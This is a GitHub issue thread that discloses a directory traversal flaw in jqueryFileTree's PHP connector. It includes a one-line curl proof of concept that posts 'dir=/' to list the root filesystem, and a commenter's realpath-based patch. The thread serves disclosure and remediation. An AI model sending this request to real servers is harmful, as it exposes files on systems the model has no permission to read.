Skip to content
This repository has been archived by the owner on Feb 10, 2021. It is now read-only.

Security issue in connectors #66

Open
ambulong opened this issue May 9, 2017 · 1 comment
Open

Security issue in connectors #66

ambulong opened this issue May 9, 2017 · 1 comment

Comments

@ambulong
Copy link

ambulong commented May 9, 2017

The connectors may cause directory traversal attack in the default settings.

POC:
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
@ambulong ambulong changed the title Security in connectors Security issue in connectors May 9, 2017
@ambulong ambulong mentioned this issue May 11, 2017
Open
@betavr
Copy link

betavr commented Aug 15, 2017

Thanks for the heads up. Here is a quick fix:

$postDir = realpath(rawurldecode($root.(isset($_POST['dir']) ? $_POST['dir'] : null ))) . "/";
if (strpos($postDir, $root) !== 0) exit("ERROR: Root filesystem directory cannot be traversed");

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ambulong @betavr